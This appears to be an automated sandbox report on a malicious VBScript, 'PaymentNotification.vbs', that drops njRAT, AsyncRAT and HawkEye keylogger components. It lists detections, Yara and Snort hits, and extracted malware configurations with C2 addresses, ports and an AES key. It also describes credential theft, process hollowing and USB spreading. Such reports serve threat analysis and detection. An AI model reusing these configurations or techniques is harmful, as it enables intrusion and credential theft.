Analysis Report PaymentNotification.vbs

Overview

General Information

Sample Name: PaymentNotification.vbs
Analysis ID: 399489
MD5: f5b9f4ae6470dd78d53b60dcc6b32a5b
SHA1: c12a160ff346463dfea1a2a5b015b0efd56a9645
SHA256: 3fb7c96dcb667562f755e56f05a892aa8326d0c905055f1ea75177e1785df46b
Tags: vbs
Detection

HawkEye njRat AsyncRAT MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected HawkEye Rat
Detected njRat
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected HawkEye Keylogger
Yara detected MailPassView
Yara detected Njrat
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the startup folder
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
May check the online IP address of the machine
Modifies the windows firewall
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Avira: detection malicious, Label: TR/Dropper.Gen7
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Roaming\servieda.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Avira: detection malicious, Label: TR/AD.MExecute.lzrac
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Avira: detection malicious, Label: SPR/Tool.MailPassView.473
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 0000000C.00000000.429733559.00000000006E2000.00000002.00020000.sdmp Malware Configuration Extractor: AsyncRAT {"Server": "185.140.53.71", "Ports": "5622", "Version": "0.5.7B", "Autorun": "false", "Install_Folder": "%AppData%", "Install_File": "", "AES_key": "OZbfeCW3Ui2w9m0b2sdvXKLHncuuEV1i", "Mutex": "AsyncMutex_6SI8OkPnk", "AntiDetection": "false", "External_config_on_Pastebin": "null", "BDOS": "false", "Startup_Delay": "3", "HWID": "null", "Certificate": "...", "ServerSignature": "...", "Group": "CONTACTS"}
Source: 0.3.wscript.exe.1b86717d130.5.raw.unpack Malware Configuration Extractor: Njrat {"Campaign ID": "SPRINGLES", "Version": "0.7d", "Install Name": "server.exe", "Install Dir": "TEMP", "Registry Value": "79c06ef4ef423d882819c4e66285ec85", "Host": "185.140.53.71", "Port": "3429", "Network Seprator": "|'|'|", "Install Flag": "False"}
Source: tmpFB21.tmp.exe.4928.13.memstr Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Metadefender: Detection: 75% Perma Link
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Metadefender: Detection: 90% Perma Link
Source: C:\Users\user\AppData\Local\Temp\pgr.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Metadefender: Detection: 90% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\servieda.exe Metadefender: Detection: 75% Perma Link
Source: C:\Users\user\AppData\Roaming\servieda.exe ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: PaymentNotification.vbs Virustotal: Detection: 12% Perma Link
Source: PaymentNotification.vbs ReversingLabs: Detection: 17%
Yara detected Njrat
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\servieda.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: TR/AD.MExecute.lzrac
Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack Avira: Label: SPR/Tool.MailPassView.473
Source: 1.0.Tmp.exe.1d0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.80000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 2.0.pgr.exe.80000.0.unpack Avira: Label: TR/Dropper.Gen7
Source: 3.0.servieda.exe.a0000.0.unpack Avira: Label: TR/Dropper.Gen
Source: 2.2.pgr.exe.3a3fd88.3.unpack Avira: Label: TR/Inject.vcoldi
Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack Avira: Label: TR/Dropper.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Unpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
Source: C:\Users\user\AppData\Roaming\servieda.exe Unpacked PE file: 3.2.servieda.exe.a0000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Unpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll Jump to behavior
Source: unknown HTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp

Spreading:

May infect USB drives
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe Binary or memory string: [autorun]
Source: tmpFB21.tmp.exe Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr Binary or memory string: autorun.inf
Source: tmpFB21.tmp.exe.2.dr Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00406EC3

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Tmp.exe Code function: 4x nop then dec eax 1_2_00007FFD067D0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 4x nop then dec eax 3_2_00007FFD067E0ADD
Source: C:\Users\user\AppData\Roaming\servieda.exe Code function: 4x nop then mov eax, dword ptr [ebp+00000128h] 3_2_00007FFD067E87B1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe Code function: 4x nop then dec eax 8_2_00007FFD06800ADD
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C914C0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C99CC0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C917F8
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then jmp 02C91A73h 13_2_02C919A1
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then jmp 02C91A73h 13_2_02C919B0
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C95B70
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C90728
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then lea esp, dword ptr [ebp-0Ch] 13_2_02C96038
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 4x nop then mov esp, ebp 13_2_02C94830

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2021176 ET TROJAN Bladabindi/njRAT CnC Command (ll) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2019214 ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2022062 ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager) 185.140.53.71:3429 -> 192.168.2.6:49706
Source: Traffic Snort IDS: 2019216 ET TROJAN njrat ver 0.7d Malware CnC Callback (Message) 192.168.2.6:49706 -> 185.140.53.71:3429
Source: Traffic Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 185.140.53.71:5622 -> 192.168.2.6:49715
Source: Traffic Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49726 -> 103.6.196.196:587
Source: Traffic Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49732 -> 103.6.196.196:587
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 185.140.53.71
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 185.140.53.71 ports 5471,1,4,5,7,5622,3429
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe DNS query: name: whatismyipaddress.com
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49705 -> 185.140.53.71:5471
Source: global traffic TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.16.154.36
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0101A09A recv, 13_2_0101A09A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: tmpFB21.tmp.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
Source: unknown DNS traffic detected: queries for: ia601504.us.archive.org
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp String found in binary or memory: http://crl.g
Source: tmp87E4.tmp.exe, 0000000C.00000002.610844081.000000000506F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0=w
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.12.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/02
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/05
Source: tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpFB21.tmp.exe String found in binary or memory: http://whatismyipaddress.com/
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://whatismyipaddress.com/-
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com-E
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com;
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comMP_
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comafet6
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comal
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comfacb
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comhly#
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
